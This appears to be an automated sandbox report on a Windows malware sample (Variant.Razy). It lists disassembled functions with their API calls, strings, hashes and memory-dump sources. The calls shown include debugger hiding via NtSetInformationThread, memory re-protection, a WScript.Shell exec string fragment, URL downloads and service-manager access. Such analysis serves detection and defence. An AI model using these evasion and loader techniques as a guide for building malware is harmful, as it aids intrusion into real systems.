__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004011E6), ref: 004133EC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,0000015C), ref: 0041340F
__vbaNew2.MSVBVM60(004101A4,00415010), ref: 00413424
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041343D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00411E38,000001C8), ref: 00413480
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004011E6), ref: 00413485
__vbaFreeStr.MSVBVM60(004134AF), ref: 004134A8

Memory Dump Source

Source File: 00000001.00000002.802381402.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.802370323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.802396539.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.802403909.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$Free$MoveNew2
String ID:
API String ID: 3514808224-0
Opcode ID: 4720ed39369b1df227d0d46fde969bf3bdddf073697a2f0c9b30b8eb4b915f32
Instruction ID: 23be1a2865835a026042c2d021d376ae2188aa8a69d49fc35e2d288375978cd6
Opcode Fuzzy Hash: 4720ed39369b1df227d0d46fde969bf3bdddf073697a2f0c9b30b8eb4b915f32
Instruction Fuzzy Hash: BF317470A40214EFCB04EF94CDC9EDEBBB8FF48701F10842AE645A72A0D7789945CB99

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: SecuriteInfo.com.Variant.Razy.845229.27038.exe PID: 6440 Parent PID: 7064 SecuriteInfo.com.Variant.Razy.845229.27038.exeCOMMON

Executed Functions

Function 005604B6, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(0056052F,?,00000000,?,?,?,?,?,005601CB), ref: 005604E4
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005606CE

Strings

Msi.dll, xrefs: 00563F04
1.!T, xrefs: 00560652

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: EnumInformationThreadWindows
String ID: 1.!T$Msi.dll
API String ID: 1954852945-1822015534
Opcode ID: 893aa010ee5f244628a99126ca8d4d71e0e3ca013c5e4927a996fa7deffbb97d
Instruction ID: fec863245719a6dc090f4124aa8d3df97ede5bd3dcdc1233b67a18161a229163
Opcode Fuzzy Hash: 893aa010ee5f244628a99126ca8d4d71e0e3ca013c5e4927a996fa7deffbb97d
Instruction Fuzzy Hash: 7D214870604305ABEF20AE20CC4ABAF2F91FBD5754F305A16BC16672C1DAB0DC41CA51

Uniqueness

Uniqueness Score: -1.00%

Function 00563635, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 91librarynativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005606CE
LdrInitializeThunk.NTDLL(?,?,?,005618C9,?,00000000,?,0000003B,0000036B,?,?), ref: 00563EC8

Strings

Msi.dll, xrefs: 00563F04
1.!T, xrefs: 00560652

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationInitializeThreadThunk
String ID: 1.!T$Msi.dll
API String ID: 1629277043-1822015534
Opcode ID: 5392e54bd180ffabe9147c211ccd4b0e9f019440df1cee014bf05b7ef5012a61
Instruction ID: f9c170a38c75c42efa88d5591d4f9ea22aa2930a557cbf7e13ba8119fcc103d1
Opcode Fuzzy Hash: 5392e54bd180ffabe9147c211ccd4b0e9f019440df1cee014bf05b7ef5012a61
Instruction Fuzzy Hash: 3C216E70644305AAEF106F20CD4ABEB3F91BB94754F308526BC021B2D5DA74DE05DA95

Uniqueness

Uniqueness Score: -1.00%

Function 00561AA2, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 400COMMON

Download Yara Rule

Strings

Msi.dll, xrefs: 00563F04
1.!T, xrefs: 00560652

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID: 1.!T$Msi.dll
API String ID: 1029625771-1822015534
Opcode ID: 4a9d20f639394c4d03f667d6578b11a0d5bb252c7d65f3a85e218be09156879b
Instruction ID: 9eda8a0d43aeca79d7ea808defab383a23b4fda0f91cc6676651d2303741f5fc
Opcode Fuzzy Hash: 4a9d20f639394c4d03f667d6578b11a0d5bb252c7d65f3a85e218be09156879b
Instruction Fuzzy Hash: 24D1F370740A06EFEB549F28CC85BE6BBA4FF48354F284229EC5997281DB74AC54CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00565209, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

Strings

Msi.dll, xrefs: 00563F04
1.!T, xrefs: 00560652

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID:
String ID: 1.!T$Msi.dll
API String ID: 0-1822015534
Opcode ID: be458ffa20ab7bd3bf0b2a1ee72613a4dc48c76d2557abece31d299ae0a340ee
Instruction ID: 790e7622db7834220a95ed6ee761d02ce14d8626edfdef00a79d6fb860b46300
Opcode Fuzzy Hash: be458ffa20ab7bd3bf0b2a1ee72613a4dc48c76d2557abece31d299ae0a340ee
Instruction Fuzzy Hash: 65318E70A483069BDF109E20CC957AB3F91BFA5754F245A1ABD435B3C2D6B0DC01DB92

Uniqueness

Uniqueness Score: -1.00%

Function 0056506B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005606CE

Strings

Msi.dll, xrefs: 00563F04
1.!T, xrefs: 00560652

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationThread
String ID: 1.!T$Msi.dll
API String ID: 4046476035-1822015534
Opcode ID: 87ad1b3c9bf0783e73b986e39e008765a769a07705ab7be71ebb3d522f338f15
Instruction ID: f5721f6536645b68c4bca4a445aed3b4220a17d65ca0a1b1c0477ba43ca764f1
Opcode Fuzzy Hash: 87ad1b3c9bf0783e73b986e39e008765a769a07705ab7be71ebb3d522f338f15
Instruction Fuzzy Hash: 6D214970A84305DBEF205E208C4ABAB2F90FB91764F30552AFD43571C2EAB4DC05DE92

Uniqueness

Uniqueness Score: -1.00%

Function 0056057F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00564B9E: LoadLibraryA.KERNEL32(?,8802EDAC,?,00565A02,0056037E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564D50

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005606CE

Strings

Msi.dll, xrefs: 00563F04
1.!T, xrefs: 00560652

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T$Msi.dll
API String ID: 543350213-1822015534
Opcode ID: 2aa1d6ae6600be5998577082286695d685a043a0a7ab55b44b5a0a2ae016fd5f
Instruction ID: d8a7a0a27b71d3c5cae215287d3b16b3a274dee586e6f6190241579185aa7674
Opcode Fuzzy Hash: 2aa1d6ae6600be5998577082286695d685a043a0a7ab55b44b5a0a2ae016fd5f
Instruction Fuzzy Hash: FC218BB0648315E7FF105A30CCAA7EF6F91BF85764F346591BD012B2C2D6A19901CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 005605B2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00564B9E: LoadLibraryA.KERNEL32(?,8802EDAC,?,00565A02,0056037E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564D50

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005606CE

Strings

Msi.dll, xrefs: 00563F04
1.!T, xrefs: 00560652

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T$Msi.dll
API String ID: 543350213-1822015534
Opcode ID: 694c4c9df5d847362f58d58ad7727e24ac0b8b7681e6636236b184aab51c8fdd
Instruction ID: 98d150560bcc14de645b5ded6adc07461025e1defaa586f539a2014f00c9da1e
Opcode Fuzzy Hash: 694c4c9df5d847362f58d58ad7727e24ac0b8b7681e6636236b184aab51c8fdd
Instruction Fuzzy Hash: B8215BF0544315A7EF105A30CCBA7DF6F55AB88764F706691FD011B2C3D6A19901D9A1

Uniqueness

Uniqueness Score: -1.00%

Function 00560F41, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?,0000005B,000000FF,00000007,00000004,00000000), ref: 00560F98

Strings

W = CreateObject("WScript.Shell")Set C = W.Exec (", xrefs: 00563FC3

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID: W = CreateObject("WScript.Shell")Set C = W.Exec ("
API String ID: 2706961497-1823131286
Opcode ID: e873dd23fdbaa9789a446734b585ebe7b7da553ae90e4f45bc2575620b22f095
Instruction ID: c73c7d8f04e5e5e4ad8f3b717e6676f3c1d23c61bcb924babf1a0efebb62f379
Opcode Fuzzy Hash: e873dd23fdbaa9789a446734b585ebe7b7da553ae90e4f45bc2575620b22f095
Instruction Fuzzy Hash: 8D316BB110468197EF219B30CD5DBEA7F65FF46368F3D01A9FA405B193C6794440C719

Uniqueness

Uniqueness Score: -1.00%

Function 00560F23, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 101nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?,0000005B,000000FF,00000007,00000004,00000000), ref: 00560F98

Strings

W = CreateObject("WScript.Shell")Set C = W.Exec (", xrefs: 00563FC3

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID: W = CreateObject("WScript.Shell")Set C = W.Exec ("
API String ID: 2706961497-1823131286
Opcode ID: e8d4e95add5f561709420959799897bf9224adfc0dab3c7e69c6de770fd4f073
Instruction ID: 3e6b277752b6d3036aa2df14e60da02a83aa1f5bdf1ea85c378411188e53bb1c
Opcode Fuzzy Hash: e8d4e95add5f561709420959799897bf9224adfc0dab3c7e69c6de770fd4f073
Instruction Fuzzy Hash: 983125715442859BEF21AB20CD4DBFA3E65FF46398F2D0129FA44AB1D2C7789884C719

Uniqueness

Uniqueness Score: -1.00%

Function 00560629, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 90nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005606CE

Part of subcall function 00564B9E: LoadLibraryA.KERNEL32(?,8802EDAC,?,00565A02,0056037E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564D50

Strings

Msi.dll, xrefs: 00563F04

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationLibraryLoadThread
String ID: Msi.dll
API String ID: 543350213-593171389
Opcode ID: e3d6ebdad46c70f0f74ddb6dde0aca1a0cdf0a7a96db29d32b7c7ec175d9de5a
Instruction ID: 69e057fbcb177e5d936e2f0755fb9b2413c71609793128d2058e77acbc935003
Opcode Fuzzy Hash: e3d6ebdad46c70f0f74ddb6dde0aca1a0cdf0a7a96db29d32b7c7ec175d9de5a
Instruction Fuzzy Hash: 3E21F1F0104759A7EB421A348CF53EFBF91EB89774F7462E1ED804B6D3D5624502CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0056069F, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005606CE

Part of subcall function 00564B9E: LoadLibraryA.KERNEL32(?,8802EDAC,?,00565A02,0056037E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564D50

Strings

Msi.dll, xrefs: 00563F04

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InformationLibraryLoadThread
String ID: Msi.dll
API String ID: 543350213-593171389
Opcode ID: d84aff143f699eeee73d8b1382db592d0d25cdb73885b103ce6729ce15fda9cc
Instruction ID: a959ec4b6de2c65e0a40d3dac2d7910e297eecc91a96c44692f1ea1c2ab871e5
Opcode Fuzzy Hash: d84aff143f699eeee73d8b1382db592d0d25cdb73885b103ce6729ce15fda9cc
Instruction Fuzzy Hash: 2201F5F0504725A7EF011A3488F53EF7F95AB993B8F7462E0ED414B3C6D8629901DAD1

Uniqueness

Uniqueness Score: -1.00%

Function 00562286, Relevance: 3.4, APIs: 2, Instructions: 400sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_00007071,00000000,00000000,00000000), ref: 0056239E

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 68f4d7a87b7aa26df0ebbca6c503b35897e04468d9b3a16dc16e76006875196b
Instruction ID: 474ff7f7c0a264fafdd6742022e2562e0f557e8cd79314bf41690f1d56e17773
Opcode Fuzzy Hash: 68f4d7a87b7aa26df0ebbca6c503b35897e04468d9b3a16dc16e76006875196b
Instruction Fuzzy Hash: 0CD120B0680B06ABFB205F10CD4ABF93E65FF45744F208525FE85AB2D1C7B89C849B56

Uniqueness

Uniqueness Score: -1.00%

Function 00566C78, Relevance: 1.6, APIs: 1, Instructions: 107COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,000000C0,?,?,-00000001,?,0056029F,00000000), ref: 00566F91

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 4ab777dec3e09e473bf7db8697649cc5c4e509aeb42627bdfa5dbb77e7dadabb
Instruction ID: 96da4f27a9650133d552d571f8f4e25d82873a57e916f20122da7f3322b3d42a
Opcode Fuzzy Hash: 4ab777dec3e09e473bf7db8697649cc5c4e509aeb42627bdfa5dbb77e7dadabb
Instruction Fuzzy Hash: CE310C3070CA0ACEEB25DB24C56C3B87EA2FF5A378F644669C54287190D3358CC4DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00564FCA, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00561F57,00000000,?,?,00000014,?,?,00000014), ref: 00565027

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 70e3d9dc4a38d026e2e3e2d67c1adb47c9f3eebeb6369a4faa2d67e2bbbea8e6
Instruction ID: 87a927b4768f07af73baa248cadcc751d972abfafc84a94d8d5ed199b45ac941
Opcode Fuzzy Hash: 70e3d9dc4a38d026e2e3e2d67c1adb47c9f3eebeb6369a4faa2d67e2bbbea8e6
Instruction Fuzzy Hash: 83115BE50999E1F3AB871A3995F91DBBF968C8E7B5AF4B0D0CE804BB1794130101D6F1

Uniqueness

Uniqueness Score: -1.00%

Function 00563E23, Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(?,?,?,005618C9,?,00000000,?,0000003B,0000036B,?,?), ref: 00563EC8

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 945f2ae524c3f5ef59943997bb6d1efce9026611b46bcb73f96668833b55cd47
Instruction ID: bc6310a0cbd725782daab0b8ab5caaaf9deddc6632f5490953625cc22507e551
Opcode Fuzzy Hash: 945f2ae524c3f5ef59943997bb6d1efce9026611b46bcb73f96668833b55cd47
Instruction Fuzzy Hash: 711127B101E7D1A7D7235B3485BA1C3BFE1AE87320BB8E0CDC8C00A663C5624601D7E2

Uniqueness

Uniqueness Score: -1.00%

Function 0056688B, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000000,?,005663AE,00000040,?,0000001D,00000000,B95DDAB0,00000FFF,?,0000001C,00000000), ref: 005668A4

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 005622A1, Relevance: 1.3, APIs: 1, Instructions: 78sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_00007071,00000000,00000000,00000000), ref: 0056239E

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: dbd27fbb1fcc0a1d34a28a42e1b0287e3bad779cd6efc46c65a1ffbf9d2c5b5a
Instruction ID: 8b5b7fde4a0f5ad8bffca04a58c26e5709b7efb7e4dcafed36b57aa3cc47eb0f
Opcode Fuzzy Hash: dbd27fbb1fcc0a1d34a28a42e1b0287e3bad779cd6efc46c65a1ffbf9d2c5b5a
Instruction Fuzzy Hash: EA21C270644B41EBFB215B34CDADBDA7EA2BF45760FB48591EA414F1E387B18940CA12

Uniqueness

Uniqueness Score: -1.00%

Function 00563572, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(?,?,?,005618C9,?,00000000,?,0000003B,0000036B,?,?), ref: 00563EC8

Strings

Msi.dll, xrefs: 00563F04

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: Msi.dll
API String ID: 2994545307-593171389
Opcode ID: 9643b1401226f1a395bccdc9024eb5b4802c9f1a04808291a5ce275a6d870e7f
Instruction ID: 2ff9632fe74fbdd9ffb432b1db2facf3b62aacf1ba444c77922857021c68f011
Opcode Fuzzy Hash: 9643b1401226f1a395bccdc9024eb5b4802c9f1a04808291a5ce275a6d870e7f
Instruction Fuzzy Hash: FB11967150E3C59ADB229F30855A3837FB4BF53310F28848DC4C14A1A3C7769A16DBD6

Uniqueness

Uniqueness Score: -1.00%

Function 005637E3, Relevance: 3.1, APIs: 2, Instructions: 92networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00563E63,00000000,00000000,00000000,00000000,005618C9,?,00000000,?,0000003B,0000036B,?,?), ref: 005637F2
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563881

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 1cdfdebd6f1400689d0c40c19fef149ed70a7d1076a4ae9910a4153d2fffa4ac
Instruction ID: 582bbf05fdfb0c80d42ddf4bc863bb1bf1db6ae02410332e9321419e5d3db223
Opcode Fuzzy Hash: 1cdfdebd6f1400689d0c40c19fef149ed70a7d1076a4ae9910a4153d2fffa4ac
Instruction Fuzzy Hash: 69317E3024438AEBEB309F54CD95FEE3A65FF04740F508425BE8AAB191D7719A84EB11

Uniqueness

Uniqueness Score: -1.00%

Function 005624C7, Relevance: 1.6, APIs: 1, Instructions: 136libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,8802EDAC,?,00565A02,0056037E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564D50

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0120cbf8a75d122aeb62cafd190039462e70156596961b7a69581fe4f27a2bd3
Instruction ID: 6250f793c76af09d57454027932296a19fd774cb42290b78ae0708130ac8a55a
Opcode Fuzzy Hash: 0120cbf8a75d122aeb62cafd190039462e70156596961b7a69581fe4f27a2bd3
Instruction Fuzzy Hash: DC4118B0644301AFEB10AF24C988BBD7E64FF54365F208A56E9568B2A1D774CD848E62

Uniqueness

Uniqueness Score: -1.00%

Function 00566C93, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,000000C0,?,?,-00000001,?,0056029F,00000000), ref: 00566F91

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: db7ec494763f67a8510886760ea8643061dc2ad6afb99760d44dabe429f40f88
Instruction ID: dc9b47e1141aa94a91db759e7576c60df97d3b2281d3af3857db666abe2647f7
Opcode Fuzzy Hash: db7ec494763f67a8510886760ea8643061dc2ad6afb99760d44dabe429f40f88
Instruction Fuzzy Hash: AF31D97020D90ADFEB258B34C5783AA7EA1FF5A378FB855D5C9418B191D33588C0DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00566D3E, Relevance: 1.6, APIs: 1, Instructions: 107COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,000000C0,?,?,-00000001,?,0056029F,00000000), ref: 00566F91

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: e02667f9371d9c28e343982dbd37de86d3f96f785e9705b31e3021cb11c683b0
Instruction ID: fe420f531c4c03de5aca3183939fd34596b8ebbe86f1de5b37814311618d1712
Opcode Fuzzy Hash: e02667f9371d9c28e343982dbd37de86d3f96f785e9705b31e3021cb11c683b0
Instruction Fuzzy Hash: 1131D96020994A9FEB168B34C5783AEBF61FF4E374FB461D5C9414B592D37248C1CAE1

Uniqueness

Uniqueness Score: -1.00%

Function 00566CC8, Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,000000C0,?,?,-00000001,?,0056029F,00000000), ref: 00566F91

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: aa4759c39d86648f712f4ddddf1533dd60540f150c0e8552bb11e9f269767b3e
Instruction ID: 7cd22b9d1a8fb607052d5ed3bbb2cbe11079ba24c8eea5b68b1b60b34c75a51b
Opcode Fuzzy Hash: aa4759c39d86648f712f4ddddf1533dd60540f150c0e8552bb11e9f269767b3e
Instruction Fuzzy Hash: AD31F87020DA09CFEB258B34C4783AE7EA1FF5A378FB86595C9414B192D33588C0DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00566D01, Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,000000C0,?,?,-00000001,?,0056029F,00000000), ref: 00566F91

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 8799cd584bd11dcd8862cecf047ebfd437775185b74de830a96ea3f96bbdf71c
Instruction ID: e1c62cc5323d5ba4967e331c2989350d09308448af1b1badd4afc11c4a940190
Opcode Fuzzy Hash: 8799cd584bd11dcd8862cecf047ebfd437775185b74de830a96ea3f96bbdf71c
Instruction Fuzzy Hash: 3031D66020D509DFEB268B34C4783AA7EA1FF5A378FB865D5C9414B192D37588C0DAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0056367E, Relevance: 1.6, APIs: 1, Instructions: 96libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00564B9E: LoadLibraryA.KERNEL32(?,8802EDAC,?,00565A02,0056037E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564D50

Part of subcall function 005637E3: InternetOpenA.WININET(00563E63,00000000,00000000,00000000,00000000,005618C9,?,00000000,?,0000003B,0000036B,?,?), ref: 005637F2
Part of subcall function 005637E3: InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563881

LdrInitializeThunk.NTDLL(?,?,?,005618C9,?,00000000,?,0000003B,0000036B,?,?), ref: 00563EC8

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InternetOpen$InitializeLibraryLoadThunk
String ID:
API String ID: 1998099105-0
Opcode ID: 5b3dda77d4586a63bef1c0da90bb714dc507f29c9314750946765393f62e7f93
Instruction ID: 8f135948d0b71142f61b52a67ffe2106b52f728960124679e416103eb7364bf9
Opcode Fuzzy Hash: 5b3dda77d4586a63bef1c0da90bb714dc507f29c9314750946765393f62e7f93
Instruction Fuzzy Hash: 0D3101B05096D69BCB229F3489693DA7FA2BF86300F74949AC8810B657C7714A01DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00566D95, Relevance: 1.6, APIs: 1, Instructions: 90COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,000000C0,?,?,-00000001,?,0056029F,00000000), ref: 00566F91

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: afc6f579d0bc6dac56471a4078cefacbdbb011752e213801fc61c45127cc1c9b
Instruction ID: 1ccbd392279e69c04900fb892c40aff15a03e6c20f6f14d4ca0bf63b85bd08d1
Opcode Fuzzy Hash: afc6f579d0bc6dac56471a4078cefacbdbb011752e213801fc61c45127cc1c9b
Instruction Fuzzy Hash: 7121B160209909DFEB168B34C4783AA7EA1FF4E378FB861D5C9414B192D37688C0DAE1

Uniqueness

Uniqueness Score: -1.00%

Function 005636C5, Relevance: 1.6, APIs: 1, Instructions: 89libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00564B9E: LoadLibraryA.KERNEL32(?,8802EDAC,?,00565A02,0056037E,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 00564D50

Part of subcall function 005637E3: InternetOpenA.WININET(00563E63,00000000,00000000,00000000,00000000,005618C9,?,00000000,?,0000003B,0000036B,?,?), ref: 005637F2
Part of subcall function 005637E3: InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00563881

LdrInitializeThunk.NTDLL(?,?,?,005618C9,?,00000000,?,0000003B,0000036B,?,?), ref: 00563EC8

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID: InternetOpen$InitializeLibraryLoadThunk
String ID:
API String ID: 1998099105-0
Opcode ID: 23c22a612b3808046ca6c1888ad98af41b44e57f1ba2709be54cd60845dbc94c
Instruction ID: 3bc4f5dc4896c6a3da8caba21d9aef2e4169d47a477b9b9f5b5e4c281d2765d0
